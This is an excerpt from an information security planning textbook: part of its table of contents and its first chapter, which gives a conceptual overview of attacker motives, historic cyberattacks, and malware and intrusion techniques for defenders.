11.7 Step 7: Monitor and Manage Changes in the Cloud ����������������������  211 11.8 Advanced: Software Development with Dev-Sec-Ops ������������������  212 11.9 Advanced: Using Blockchain���������������������������������������������������������  212 11.10 Advanced: Zero Trust���������������������������������������������������������������������  213 11.10.1 Important Concepts����������������������������������������������������������  214 11.10.2 Zero Trust Architecture ����������������������������������������������������  215 11.11 Zero Trust Planning������������������������������������������������������������������������  217 11.11.1 Network and Cloud Checklist for Zero Trust ������������������  218 11.12 Questions����������������������������������������������������������������������������������������  218 References��������������������������������������������������������������������������������������������������  220 12 Organizing Personnel Security ��������������������������������������������������������������  221 12.1 Step 1: Controlling Employee Threats��������������������������������������������  222 12.2 Step 2: Allocating Responsibility to Roles ������������������������������������  226 12.3 Step 3: Define Training for Security ����������������������������������������������  227 12.4 Step 4: Designing Tools to Manage Security����������������������������������  228 12.4.1 Code of Conduct and Acceptable Use Policy ������������������  229 12.4.2 Configuration Management and Change Control ������������  230 12.4.3 Service Level Agreements������������������������������������������������  230 12.5 Questions and Problems������������������������������������������������������������������  231 12.5.1 Health First Case Study Problems��������������������������������������  232 References��������������������������������������������������������������������������������������������������  232 Part IV Planning for Detect, Respond, Recover 13 Planning  for Incident Response��������������������������������������������������������������  237 13.1 Important Statistics and Concepts��������������������������������������������������  238 13.2 Developing an Incident Response Plan������������������������������������������  240 13.2.1 Step 1: Preparation Stage��������������������������������������������������  241 13.2.2 Step 2: Identification Stage ����������������������������������������������  248 13.2.3 Step 3: Containment and Escalation Stage ����������������������  250 13.2.4 Step 4: Analysis and Eradication Stage����������������������������  251 13.2.5 Step 5: Notification and Ex-post Response Stages (If Necessary)��������������������������������������������������������������������  252 13.2.6 Step 6: Recovery and Lessons Learned Stages����������������  253 13.3 Preparing for Incident Response����������������������������������������������������  253 13.4 Questions and Problems������������������������������������������������������������������  254 13.4.1 Health First Case Study Problems��������������������������������������  256 References��������������������������������������������������������������������������������������������������  256 14 Defining Security Metrics������������������������������������������������������������������������  259 14.1 Implementing Business-Driven Metrics ����������������������������������������  260 14.2 Implementing Technology-Driven Metrics������������������������������������  261 14.3 Questions and Problems������������������������������������������������������������������  268 14.3.1 Health First Case Study Problems������������������������������������  269 References��������������������������������������������������������������������������������������������������  269

xviii

Contents

15 Performing  an Audit or Security Test����������������������������������������������������  271 15.1 Testing Internally and Simple Audits����������������������������������������������  272 15.1.1 Step 1: Gathering Information, Planning the Audit����������  273 15.1.2 Step 2: Reviewing Internal Controls��������������������������������  277 15.1.3 Step 3: Performing Compliance and Substantive Tests����  277 15.1.4 Step 4: Preparing and Presenting the Report��������������������  280 15.2 Example: PCI DSS Audits and Report on Compliance������������������  281 15.3 Professional and External Auditing������������������������������������������������  283 15.3.1 Audit Resources����������������������������������������������������������������  283 15.3.2 Sampling ��������������������������������������������������������������������������  284 15.3.3 Evidence and Conclusions������������������������������������������������  286 15.3.4 Variations in Audit Types��������������������������������������������������  287 15.4 Questions and Problems������������������������������������������������������������������  287 15.4.1 Health First Case Study Problems������������������������������������  289 References��������������������������������������������������������������������������������������������������  289 16 Preparing for Forensic Analysis��������������������������������������������������������������  291 16.1 Important Concepts������������������������������������������������������������������������  291 16.2 High-Level Forensic Analysis: Investigating an Incident ��������������  293 16.2.1 Establishing Forensic Questions ��������������������������������������  293 16.2.2 Collecting Important Information ������������������������������������  293 16.3 Technical Perspective: Methods to Collect Evidence ��������������������  297 16.3.1 Collecting Volatile Information Using a Jump Kit ����������  297 16.3.2 Collecting and Analyzing Important Logs������������������������  299 16.3.3 Collecting and Forensically Analyzing a Disk Image������  301 16.4 Legal Perspective: Establishing Chain of Custody ������������������������  303 16.5 Advanced: The Judicial Procedure�������������������������������������������������  305 16.6 Questions and Problems������������������������������������������������������������������  306 References��������������������������������������������������������������������������������������������������  308 Part V Complying with National Regulations and Ethics 17 Complying  with the European Union General Data Protection Regulation (GDPR)����������������������������������������������������������������������������������  311 17.1 Background ������������������������������������������������������������������������������������  311 17.2 Applicability ����������������������������������������������������������������������������������  312 17.3 General Requirements��������������������������������������������������������������������  312 17.4 Rights Afforded to Data Subjects���������������������������������������������������  312 17.4.1 Right of Access by the Data Subject (Article 15) ������������  313 17.4.2 Right to Rectification (Article 16)������������������������������������  313 17.4.3 Right to Erasure (‘Right to Be Forgotten’) (Article 17)������������������������������������������������������������������������  314 17.4.4 Right to Restriction of Processing (Article 18)����������������  314 17.4.5 Right to Data Portability (Article 20) ������������������������������  314 17.4.6 Right to Object to Processing (Article 21)������������������������  315

Contents

xix

17.4.7 Right to Not Be Subject to a Decision Based Solely on Automated Processing (Article 22)������������������������������  315 17.4.8 Rights of Remedies, Liabilities and Penalties (Articles 77–79)����������������������������������������������������������������  315 17.4.9 Privilege of Notification (Article 13, 14)��������������������������  316 17.4.10 Privilege of Communicated Response (Article 12)����������  316 17.4.11 Privilege of Protection of Special Groups (Article 9, 10)��������������������������������������������������������������������  316 17.5 Restrictions to Rights (Article 23)��������������������������������������������������  317 17.6 Controller Processing Requirements����������������������������������������������  317 17.6.1 Risk Management and Security����������������������������������������  317 17.6.2 Breach Notification ����������������������������������������������������������  318 17.6.3 Penalties����������������������������������������������������������������������������  318 17.6.4 Certification and Adequacy Decisions������������������������������  319 17.6.5 Management and Third-Party Relationships��������������������  319 17.7 Actual GDPR Cases������������������������������������������������������������������������  320 17.8 Questions and Problems������������������������������������������������������������������  320 References��������������������������������������������������������������������������������������������������  322 18 Complying  with U.S. Security Regulations��������������������������������������������  323 18.1 Security Laws Affecting U.S. Organizations����������������������������������  323 18.1.1 State Breach Notification Laws����������������������������������������  324 18.1.2 HIPAA/HITECH Act, 1996, 2009������������������������������������  326 18.1.3 Sarbanes-Oxley Act (SOX), 2002 ������������������������������������  327 18.1.4 Gramm–Leach–Bliley Act (GLB), 1999��������������������������  330 18.1.5 Identity Theft Red Flags Rule, 2007��������������������������������  330 18.1.6 Family Educational Rights and Privacy Act (FERPA), 1974, and Other Child Protection Laws���������������������������  331 18.1.7 Federal Information Security Management Act (FISMA), 2002 ����������������������������������������������������������������  332 18.1.8 California Consumer Privacy Act (CCPA)������������������������  334 18.2 Computer Abuse Laws��������������������������������������������������������������������  336 18.3 Other Laws��������������������������������������������������������������������������������������  337 18.4 Final Considerations ����������������������������������������������������������������������  338 18.5 Advanced: Understanding the Context of Law������������������������������  339 18.6 Questions and Problems������������������������������������������������������������������  340 References��������������������������������������������������������������������������������������������������  342 19 Complying  with HIPAA and HITECH��������������������������������������������������  345 19.1 Background ������������������������������������������������������������������������������������  345 19.2 Introduction and Vocabulary ����������������������������������������������������������  347 19.3 HITECH Breach Notification ��������������������������������������������������������  349 19.4 HIPAA Privacy Rule ����������������������������������������������������������������������  350 19.4.1 Patient Privacy and Rights������������������������������������������������  351

xx

Contents

19.5 HIPAA Security Rule����������������������������������������������������������������������  354 19.5.1 Administrative Requirements ������������������������������������������  354 19.5.2 Physical Security��������������������������������������������������������������  361 19.5.3 Technical Controls������������������������������������������������������������  362 19.6 Recent and Proposed Changes in Regulation ��������������������������������  362 19.7 Questions and Problems������������������������������������������������������������������  363 19.7.1 Health First Case Study Problems������������������������������������  364 References��������������������������������������������������������������������������������������������������  364 20 Maturing Ethical Risk ����������������������������������������������������������������������������  367 20.1 Important Concepts������������������������������������������������������������������������  368 20.2 Raising Ethical Maturity through an Ethical Risk Framework������  368 20.2.1 Raising Self-centered Ethical Concern ����������������������������  368 20.2.2 Adhering to Regulation����������������������������������������������������  370 20.2.3 Respecting Stakeholder Concerns������������������������������������  371 20.2.4 Addressing Societal Concerns������������������������������������������  372 20.3 Questions����������������������������������������������������������������������������������������  374 References��������������������������������������������������������������������������������������������������  376 Part VI Developing Secure Software 21 Understanding Software Threats and Vulnerabilities��������������������������  381 21.1 Important Concepts and Goals��������������������������������������������������������  382 21.2 Threats to Input ������������������������������������������������������������������������������  382 21.2.1 Recognize Injection Attacks ��������������������������������������������  385 21.2.2 Control Cross-site scripting (XSS) ����������������������������������  387 21.2.3 Authentication and Access Control����������������������������������  390 21.2.4 Recognize Cross-Site Request Forgery (CSRF) ��������������  391 21.2.5 Minimize Access��������������������������������������������������������������  392 21.3 Implement Security Features����������������������������������������������������������  393 21.4 Testing Issues����������������������������������������������������������������������������������  395 21.5 Deployment Issues��������������������������������������������������������������������������  396 21.5.1 Validate and Control the Configuration����������������������������  397 21.5.2 Questions and Problems����������������������������������������������������  397 References��������������������������������������������������������������������������������������������������  399 22 Defining  a Secure Software Process ������������������������������������������������������  401 22.1 Important Concepts������������������������������������������������������������������������  402 22.1.1 Software Security Maturity Models����������������������������������  402 22.1.2 The Secure Software Group����������������������������������������������  403 22.2 Secure Development Life Cycle ����������������������������������������������������  404 22.2.1 Coding������������������������������������������������������������������������������  405 22.2.2 Testing������������������������������������������������������������������������������  405 22.2.3 Deployment, Operations, Maintenance and Disposal������  407 22.3 Secure Agile Development��������������������������������������������������������������  408 22.3.1 Designing Agile Style: Evil User Stories��������������������������  408

Contents

xxi

22.4 Example Secure Process: PCI Software Security Framework��������  409 22.5 Security Industry Standard: Common Criteria ������������������������������  412 22.6 Questions and Problems������������������������������������������������������������������  413 22.6.1 Health First Case Study Problems������������������������������������  414 References��������������������������������������������������������������������������������������������������  415 23 Planning  for Secure Software Requirements and Design with UML��������������������������������������������������������������������������������������������������  417 23.1 Important Concepts and Principles in Secure Software Design ����  418 23.2 Evaluating Security Requirements��������������������������������������������������  420 23.2.1 Step 1: Identify Critical Assets ����������������������������������������  421 23.2.2 Step 2: Define Security Goals ������������������������������������������  422 23.2.3 Step 3: Identify Threats����������������������������������������������������  423 23.2.4 Step 4: Analyze Risks ������������������������������������������������������  427 23.2.5 Step 5: Define Security Requirements������������������������������  428 23.2.6 Specify Reliability, Robustness����������������������������������������  431 23.3 Analysis/Design������������������������������������������������������������������������������  432 23.3.1 Static Model����������������������������������������������������������������������  432 23.3.2 Dynamic Model����������������������������������������������������������������  435 23.4 Example Secure Design: PCI Software Security Framework��������  439 23.5 Questions and Problems������������������������������������������������������������������  442 23.5.1 Health First Case Study Problems������������������������������������  444 References��������������������������������������������������������������������������������������������������  444

Part I

The Problem of Security

This section informs why security is an issue that must be addressed. It delves into current problem areas that certain industries may specifically need to address, related to hackers and malware (Chap. 1), social engineering and fraud (Chap. 2), and payment card standards, which organizations need to adhere to if they accept credit cards (Chap. 3). Regulation relating to security is also an area that needs to be addressed, but is in Part V, outlining United States and European Union regulation. Understanding inherent threats and security requirements well will help in later sections to define your organization’s specific security needs. Therefore, as you read through this section, consider which attacks might affect your industry and organization, and as part of the planning process, note them down.

Chapter 1

Security Awareness: Brave New World

When Leon Panetta, former U.S. Secretary of Defense, drive their internet-connected Lexus, he has careful (likely semi-serious) instructions for his passenger: “I tell my wife, ‘Now be careful what you say.’” – Nicole Perlroth, author, They Tell Me This Is How the World Ends, and NY Times cybersecurity writer [1]

Computer security is a challenge. An attacker only needs to find one hole…but a defender needs to close all holes. Since it is impossible to close all holes, you can only hope to close most holes, layer defenses (like you layer clothes when going out in the freezing cold), and hope that the intruder will find an easier target elsewhere. How do you close most holes? The first step is to educate yourself about security and ways crackers attack. The next step is to ensure that all employees understand their roles in guarding security. This chapter is about educating yourself about malware, hacking and the motives of computer attackers, and how to start to defend the simplest of devices: your mobile and home computers.

1.1 With Security, Every Person Counts Imagine you open 20+ emails daily. Today you receive one with a promising video. You click to download it. Most emails are innocuous, but this one contains hidden malware. While you enjoy your video, the video is also secretly executing a worm and turning your computer into a zombie or copying password files. You are now, unknowingly, infected (but the video was cool!) Alternatively, an infected email, called a phish, may claim to be from someone in your organization sending you an infected Word or Excel document, but appearing to be a routine business email. Installing malware within a network is only the first step that an attacker would take in order to get a foothold in the network. But their end goal is likely to be: • exfiltrating (or downloading) confidential or proprietary business or government information for espionage, competitive and/or financial cybercrime reasons; • financial extortion through damaging your files, overwhelming your servers, and/or promising to publish confidential data if their fee is not paid;

© The Author(s), under exclusive license to Springer Nature Switzerland AG 2024 S. Lincke, Information Security Planning, https://doi.org/10.1007/978-3-031-43118-0_1

3

4

1  Security Awareness: Brave New World

• disruption of business, by damaging equipment or overwhelming webpages e.g., for information warfare purposes; • financial theft through impersonating a vendor, increasing advertising clicks, or other fraudulent activities (covered in Chap. 2).

1.2 Attackers and Motives Business managers, a computer programmers, or others employed in an IT/Security field, should be aware of how an organization can be attacked, beyond user security awareness. Threats may arise from disgruntled employees or contracts, political enemies, financially-motivated criminals and spies or spying governments. This chapter reviews each of these in turn. Consider which of these might be prioritized as risks for your organization.

1.2.1 Cybercrime In most attacks, the attacker has criminal intent. The attacker’s goal may be extortion: encrypting crucial disks and demanding payment to unencrypt it. Ransomware (e.g., CryptoLocker) can corrupt backups before demanding payment [39]. Often there is an explicit threat that the organization’s confidential information will be released. Thus, even if there is a good backup to recover the database, extortioners may demand you pay to prevent public disclosure. In May of 2021, Colonial Pipeline’s network was ransomed, the company took down their entire gas line system, affecting sales of 45% of gasoline, diesel, and jet fuel to east coast U.S. for nearly 1 week, affecting business all along the coast [31]. Colonial Pipeline paid $5 million to the ransomers. Extortion may also be demanded for a Distributed Denial of Service (DDOS) attack, where an organization’s network or prime web server is overwhelmed with fake transactions, and the ransomers demand payment to stop [39]. Verizon’s 2022 Data Breach Investigation Report indicates that DDOS attacks generate a median of 1.3 Gbps of packets for 4 h. The vast majority of organizations experience attacks less than 10 times per year, if not a heavy target [2]. Data breaches, whether used with ransomware or simply to obtain information for sale or use, is also primarily accessed for cybercrime purposes. Verizon’s 2022 Data Breach Investigation Report also indicates that stolen information includes personal (77%), medical (43%), other (15%) and bank (9%) [2]. Personal, medical and financial information can be sold or used for information theft purposes. It is important to understand the cost of ignoring security. Company websites are also prone to breaches for cybercrime reasons. In July, 2013, five foreign hackers

1.2  Attackers and Motives

5

stole and sold 160 million credit card numbers from a number of companies, including J.C. Penney, 7-Eleven, JetBlue, Heartland Payment Systems (a credit/debit processing company), Citibank, PNC Bank, Nasdaq, supermarket Hannaford, and the French retailer Carrefour. The technique used by these criminals was an SQL Injection Attack, where a criminal alters database commands by manipulating forms at websites, in order to extract or change information in the database. Heartland disclosed that it lost $200 million with the credit card losses [3]. A final way for cybercriminals to make money is through the sale of malware (malicious software or attack software). Web cracking is lucrative, attracting organized crime who often live outside the countries they are attacking. Crime rings tend to have specialized skills, where each person has a specific role: the skilled person who breaks into sites, the person who extracts credit card information, and the person who sells the data [3]. When caught internationally, they can be extradited to the country where the crime was committed. One well-known crime ring includes the Russian Business Network, which specializes in malware, identity theft, and child pornography [6]. An antidote to web cracking is skilled penetration testing (or pen testing). Criminals do this with your website, so you too must to find all security holes before they do. If an organization develops any software or firmware, it is important to have programmers who are skilled in software security, develop or review all code.

1.2.2 Espionage Spying and disruption are the goals of some governments and hacker groups. Theft of intellectual property is a case where a company puts money into designing a product, but soon finds it must compete with a foreign company, who stole their design. Chinese tactics to obtain information include purchasing high-tech companies, sharing trade secrets in exchange for access to the Chinese market, and theft through secret installations of Trojan horses and exfiltration. Another technique is to invite Chinese nationals from U.S. or Europe to present their expertise in technologies at Chinese conferences, wine and dine them, take them on sightseeing tours all expenses paid, paying a speaker fee, and then ask for more information in a continuing relationship [33]. Defenses include prohibiting presentations on corporate technologies, with companies minimally firing employees for violations. Jail sentences have ranged between 27 months to 20–24 years for spy recruiters. Spying also occurs for internal government information and control. It is believed that China used infected, command-and-control email against embassies, foreign ministries, Chinese dissidents and Tibetan exile centers in 2009. The Canadian government was infected with a spyware virus in 2011 that was traced back to China [23].

6

1  Security Awareness: Brave New World

The New  York Times has published its experience with a Chinese intrusion, which is an example of a lengthy targeted attack, called an Advanced Persistent Threat (APT). It is described here, because of the depth of information provided by their story [21]. Hackers most likely gained initial entrance through spear phishing, set up backdoors into users’ machines, and then installed 45 pieces of custom malware, the majority of which was not recognized by antivirus software. Hackers also stole passwords for every Times employee and proceeded to hack into the personal computers of 53 employees. Security experts indicate that the Chinese were interested in learning about informants for reports relating to China’s prime minister, Wen Jiabo. Fortunately, they left customer data alone. Hacker teams started their attacks at 8 AM Beijing time, and hacked continuously, sometimes until midnight. Attacks were launched through American universities, which have labs filled with computers. After 4 months of attacks, the New York Times finally managed to eliminate the Chinese threat, through the assistance of the Mandiant Security Company. The Wall Street Journal and Washington Post have also reported being hacked [44]. Cybercrime organizations also use APT on other industries, but those stories are rarely published for privacy purposes. One advanced persistent threat technique that emerged in 2020 was the Supply Chain attack, where a criminal organization implanted malware into a software product of a victim organization (Solarwinds), which was then unknowingly uploaded as updates into 18,000 organizations that used that software product [32, 34]. This particular attack was believed to be instigated by the Russian government corrupting a tool within the Jet Brains IDE tools. This demonstrates a vulnerability in use of third party software. However, it is still recommended that patches be applied to your software, since most patches fix security issues and defects, while supply chain attacks are still rare. The Surveillance State is where a government monitors Internet traffic and data. In the suspicious years following the 9/11 attacks, the U.S.  National Security Agency (NSA) and/or Federal Bureau of Investigation (FBI) intimidated a number of organizations, including Verizon, Google, Yahoo, Microsoft and Facebook, and gag orders prevented companies from speaking out [15]. Edward Snowden’s releases uncovered that nearly 200 million records were sent to NSA from Yahoo and Google for December, 2012, including email metadata (headers) and content [16]. The NSA has requested or manipulated companies to water down encryption algorithms; install backdoors in software products; as well as provide communication data [17]. One story that has emerged is the story of Lavabit, a company which provided secure email services [40]. Lavabit had been asked to place taps on a few accounts and had complied. However, in the spring 2013, the FBI asked Ladar Levison, Lavabit’s founder, for a tap for Snowden. They asked for passwords for all his clients, the organization’s private key (which decrypts all encryptions sent by the company), and computer code. Levison attempted to negotiate to provide Snowden’s information daily, but the FBI wanted the information in real time (minute by

1.2  Attackers and Motives

7

minute). Levison was fined $5000 per day by a court until he provided it electronically. After 2 days, Levison provided the key electronically and closed his company down. That day, he wrote on his website: “I would strongly recommend against anyone trusting their private data to a company with physical ties to the United States. [19]” Unfortunately, this government spying and intrusion is likely to make buyers wary of products from any countries involved in information warfare or surveillance state actions, due to disintegrated trust [41]. In response to Snowden leaks, American President Obama promised to name a new senior official to implement new privacy measures, to protect the American people, ordinary foreign people, and foreign leaders when a “compelling national security purpose” is not evident [20]. The surveillance state is aided by the surveillance industry. Today, standard industry practices of selling customer information has in cases become illegal, as privacy regulation requirements have been instituted in many nations and states. In 2022, Instagram’s violation of children’s privacy, which included publishing children’s email addresses and phone numbers, resulted in a European Union GDPR violation that totaled €405 million [38].

1.2.3 Information Warfare Governments fear that the next wars will involve computer attacks to infrastructure, such as power, water, financial systems, military systems, etc., as part of Information Warfare. A goal would be to disrupt society, and certainly the loss of electricity, gas and water would do so [35]. Cyberweapons are extremely cheap compared to the military variety, and can cause as much or more damage with less military personnel exposure and with more anonymity (and thus deniability). Thus, protecting utilities and other critical infrastructure is of crucial priority. The first publicized used of cyberweapons was the 2010 Stuxnet worm, reputedly developed by the U.S. and Israel. Stuxnet took out nearly 1000 Iranian centrifuges, or nearly one fifth of those in service within Iranian nuclear power plants [22]. Iran replied by attacking American banks and foreign oil companies [21]. Stuxnet was only the first attack on electric grids. Russia attacked Ukraine’s electric utility two cold Decembers in a row, 2015 and 2016, taking the entire grid down the second year and exposing many homes to no heat [29]. An earlier Russian method of cyber-warfare is DDOS, which was used against Estonian government, financial institutions and newspapers in 2007, and Georgian government websites and Internet infrastructure in 2008 [23]. Some ransomware is really meant to destroy or be a decoy for espionage operations – criminals will be happy to receive your ransom payment, with no intent to recover your data. With Petya/NotPetya, ransomers inflicted damage, while demanding payment. The Phonywall version served as a decoy: perpetrators stole information then wrote over disks to hide their tracks [30].

8

1  Security Awareness: Brave New World

Crackers can threaten anything computerized, including personal cars and homes. Security researchers have shown that car brakes and steering could be remotely controlled [24]. Seven hundred home security cameras were hacked, and peoples’ private lives were put on display on webpages [25]. If a company does not protect its software products, by taking security very seriously, it can find its products hacked and its problems publicized in the news. In the U.S., the organization can then expect a very expensive visit from the Federal Trade Commission (FTC). The FTC may specify a 20-year-security compliance audit program (as it did for TRENDnet [25]) and may launch megafines when laws are violated. You will read more about this in chapters on regulation. Hacktivism involves non-government groups attacking to achieve specific political causes (e.g., Mexican miner rights, Wikileak support) in illegal ways (e.g., DDOS attacks, defacing or taking down websites). For example, Anonymous is an example unorganized hacktivist organization, and Operation Payback involved a massive DDOS attack on Visa, MasterCard, Motion Pictures of America, and the Recording Industry of America for 5 months starting September 2010 [13]. Credit card companies were attacked after they suspended payment to WikiLeaks. In addition, some Anonymous members have been arrested for common credit card theft [14]. Hacktivism is a small portion of criminal cases, summing to about 1% of all forensically analyzed attacks [36]. If an organization has vital proprietary information or trade secrets, accepts credit cards, manages money, owns computers, creates products with software in them, and/or plays a vital role in a community, security is an issue. Criminals know small businesses are easier to break into. Small businesses make an attractive target because they tend to lack strong security [2], and attacks can and have put small companies out of business. Table 1.1 reveals that different exploits can be classified as part of cybersecurity history. Unfortunately, older threat types do not disappear as new threats emerge. Hopefully this chapter has been informative and made you think of potential threats to your organization. The Security Workbook, available with this book, enables you to document these threats as part of the Workbook’s Chap. 2. Writing them there will help with future chapters. Questions to consider include: (a) Select the threats which are a concern in your industry: experimentation/vandalism, hacktivism, cyber-crime, information warfare, intellectual property theft, surveillance state. List your threats in priority order and describe a scenario and the potential damage for each threat. (b) List the exploits (or attacks) that are most serious and likely to occur in your workplace. For each exploit, describe what the impact might be for your workplace.

1.3  Criminal Techniques to Enter, Investigate, and Persist in a Network

9

Table 1.1  History and categories of internet crime Threat type Experimentation

Year: example threats 1984: Fred Cohen publishes “Computer Viruses: Theory and Experiments” [26] Vandalism 1988: Jerusalem Virus deletes all executable files on the system, on Friday the 13th [5] 1991: Michelangelo Virus reformats hard drives on March 6, Michelangelo’s birthday Hacktivism 2010: Anonymous’ Operation Payback hits credit card and communication companies with DDOS after payment cards refuse to accept payment for Wiki-Leaks Cybercrime 2008, 2009: Gonzales re-arrested for sniffing WLANs and implanting spyware, affecting 171 million credit cards [27] 2013: In July 160 million credit card numbers are stolen via SQL Injection Attack. Later in Dec. 70 million credit card numbers are stolen through target stores [3] 2016–2022: Uber pays $100,000 in ransom to criminals, but pretends instead to purchase bug information. For covering up a breach, Uber later pays $148 million to settle claims and the chief security officer is tried and convicted [37] Information warfare 2007, 2008: Russia launches DDOS attack against Estonia, then Georgia news, gov’t, banks [23] 2016: Russia takes down Ukraine’s entire electric grid a December evening – 2 years in a row [29] Surveillance state/espionage 2012: State affiliated actors mainly tied to China quietly attack U.S./foreign businesses to steal intellectual property secrets, summing to 19% of all forensically analyzed breaches [39] 2013: Lavabit closes secure email service rather than divulge corporate private key to NSA without customers’ knowledge 2021: Solarwinds supply chain attacks install malware into 18,000 organizations through unknowingly infected third-party software [34] 2022: Instagram is charged €405 million for publishing children’s emails and phone numbers, as part of GDPR [38]

1.3 Criminal Techniques to Enter, Investigate, and Persist in a Network Between obtaining their first foothold into a network and achieving their final goal, criminals will take a series of steps to search the network, expand their capabilities and hide their tracks. This chapter outlines some of the steps and techniques they use to enter and peruse a network. The first step a sophisticated attacker usually takes will be to learn a lot about an organization and network. They want to understand who works there (names, titles, rank) and the lingo used, so that they may deploy phishing and spear phishing successfully. The want to learn the deployed software, to launch effective attacks against potential vulnerabilities. They may want to learn the organizations’ financial

10

1  Security Awareness: Brave New World

situation, e.g., to set a high but financially reasonable ransom price. They will learn this through web and news searches and investigating garbage (often through literal dumpster diving.) Verizon’s 2022 Data Breach Investigation Report indicates that initial common ways to enter a targeted network and implant their initial malicious software (or malware) include web application attacks, email, carelessness (or errors) and desktop sharing software (or logging into machines remotely) [2]. Web attacks often use vulnerabilities, or software or configuration defects, that enable attackers to gain entry. Patching all software in a timely manner – network, operating system, and applications – is important to closing such vulnerabilities. Criminals or crackers often launch attacks using email and web scams. Phishing is an email scam, where the email serves as a hook and people in your organization are the intended fish! An email from ‘your’ bank can request immediate action, or ask you to help in transferring money from a foreign country. The email can be well-­ written to fool even the most suspicious – or poorly written to attract only the most gullible. Spear phishing is when a particular person is targeted for a special scam email, using knowledge of their interests, friends, and lifestyle. Pharming is a web scam, where a scam webpage can resemble a real webpage. Often a phishing email may include a link to a pharmed webpage. Clicking on that link causes infection – or by logging in, you may unknowingly give them account information or access. However, it is not only pharming sites that are infected with malware. Google has reported that it flags some 10,000 sites daily for infections and warns webmasters and users during Google searches [6]. A risk is that eventually someone in your department is likely to take the bait through opening an email attachment, following a link to an infected web site, or inserting an infected memory into a computer. One specific type of email attachment or web download could be a Trojan horse. Similar to the Greek story during the Trojan war, when the Achaean army hid inside a large wooden Trojan horse given as a gift to the city of Troy, a computer Trojan horse is a real program that is advertised to do one thing (e.g., display a video clip), while it secretly also does something malicious. For example, the Zeus Trojan turned millions of computers into Zeus bots [5], often via Facebook [6]. Zeus stays dormant on a compromised computer until the victim logs into a bank site. Then, it steals the victim’s passwords and is used to empty the victim’s accounts [6]. It also can impersonate a bank’s website in order to collect private information, such as social security numbers and/or bank account numbers, to sell on the dark web. Once an attacker has entered a network, often they may want to expand their capabilities by learning password credentials. One option is that she may install a keystroke logger which records the keys entered. As you enter a password or credit card information, these keystrokes are secretly sent over an internet connection to the criminal. Soon you could see unusual emails coming from your account, strange charges on your credit card statement, or learn that an account has been opened in your name. In bulk, credit card numbers have been sold for as low as $1 a piece [4]. Prices are low due to successful criminal rings, such as Gonzalez’s, who cracked and exposed over 170 million credit card numbers [42].

1.3  Criminal Techniques to Enter, Investigate, and Persist in a Network

11

In addition, the intruder may want to hide their actions, while waiting to steal information, such as passwords, credit card numbers, or confidential or organizational proprietary information. The malware may install a backdoor, which is a program that enables the attacker to gain entry to a computer without a password. A rootkit, when installed, hides all tracks of the attacker, including modifying computer logs and causing the operating system utilities to not display programs that the attacker executes. Many proprietary secrets have recently appeared within Chinese companies, who then compete with the original companies for their business – without the expense of product development. If the attacker wants to disrupt operations for extortion, information warfare or grudge reasons, a means to disrupt service or damage equipment is a Denial of Service (DoS) attack, where the attacker may cause a server to lockup periodically, clearing the server’s hard drive (e.g., Shamoon), or run a program that heavily uses system resources, making the server sluggish. Alternatively, criminals want to infiltrate computers to store exploit or spam software, or host illegal movies or pornography. Why should they buy computers when they can infiltrate computers for free? The malware may turn a computer into a zombie or bot (short for robot). First, they may insert a backdoor to freely access the computer, then install a rootkit to hide their tracks, and finally insert control software into the computer. The control program enables them to house hidden files (e.g., illegal movies or pornography) on the computer, or to launch attacks against other computers. A criminal organization may create an army of these bots, called a botnet. Time on a botnet has been sold for low prices of $100 per 1000 infected computers [43]. Remember the law of supply and demand? If supply is high, the price becomes low. The kinds of exploits that botnets may perform include massive spamming, Distributed Denial of Service attacks, password cracking, and hiding other illegal attacks. In each of these exploits, hundreds or thousands of computers (or bots) are commanded to attack. Spammers may generate the massive impersonal emails we receive daily. Password cracking programs automatically guess passwords, until a successful login occurs. Alternatively, a file containing password hashes can be copied from an infiltrated computer and a large set of bots can analyze the passwords at their leisure. This can happen to computers, without their owners knowing. Botnets need to expand to an army of infiltrated host computers, and worms and viruses are one automated mechanism that can grow networks through their propagation stage. A worm may look at an email contact list and automatically email itself to these contacts or try in other ways to connect to neighboring computers within a network. A virus will attach itself to a useful program and will execute with that program – and possibly install itself as a startup program to ensure it is automatically executed when a computer powers up. Both worms and viruses have a propagation stage, a triggering stage which sets the time for the next stage, and the execution stage, which executes whatever the malware was designed for. The difference between a virus and worm is that a worm is a standalone program, whereas the virus attaches itself to other programs.

12

1  Security Awareness: Brave New World

Malware may also be used for other purposes. Spyware, useful in espionage and surveillance state, includes keystroke loggers, but also software which monitors their owners’ location or website accesses to sell those interests to data warehouses or authoritarian governments. Spyware can also use an infiltrated computer’s camera and/or microphone to record their actions. It has been estimated that spyware/ keyloggers were included in 75% of all malware [39]. Other malware might be used for financial gain or control. Adware may show pop-ups of specific ads, or prevent owners from accessing specific web sites, including preferred search engines. A logic bomb is a program where the author has inserted code to potentially do something malicious at a triggered time. An example might be that a software program may fail if the company fails to pay a maintenance fee or a programmer is fired. Why doesn’t law enforcement stop cybercrime and espionage? It is very difficult. The Internet crosses borders without passport control and jurisdiction is an issue. During the last century, if someone wanted to rob a bank, they would physically have to go to the bank with a gun. Today, unsophisticated computer crackers can rob a bank in your nation without leaving their living room from another continent. They can purchase or rent a malware toolkit containing a keystroke logger to use to password credentials [7]. In addition, a criminal may live in Russia, ‘own’ a botnet control computer in Yugoslavia, and ‘own’ bots all over the world. Thus, if a government tracks an exploit to a bot, they will likely need to involve multiple governments and agencies in tracking the attack to the original criminal. Many governments have higher priority problems than Internet crime occurring in other countries. In fact, criminal organizations may be normally operating businesses. Intelligent criminals can and do hide their tracks internationally. As a measure of defense, the FBI now stations cybersecurity experts at embassies in various parts of the world to negotiate with local law enforcement [18]. These are the common types of exploits that every computer user should be aware of. If law enforcement cannot help protect much, then you must protect yourself and your organization. The next section discusses what every user should do to protect themselves. More advanced security measures will be discussed in later sections of this text.

1.4 Protecting Yourself The best way to protect yourself is to never be vulnerable: never connect to the Internet, or any other network, turn off your wireless network connection, and never load files from external sources. Do all this and your computer is still vulnerable to physical access. If you are not willing to live the life of an Internet hermit, then you have chosen to take non-negligible risks. You can only minimize risks, not eliminate them.

1.4  Protecting Yourself

13

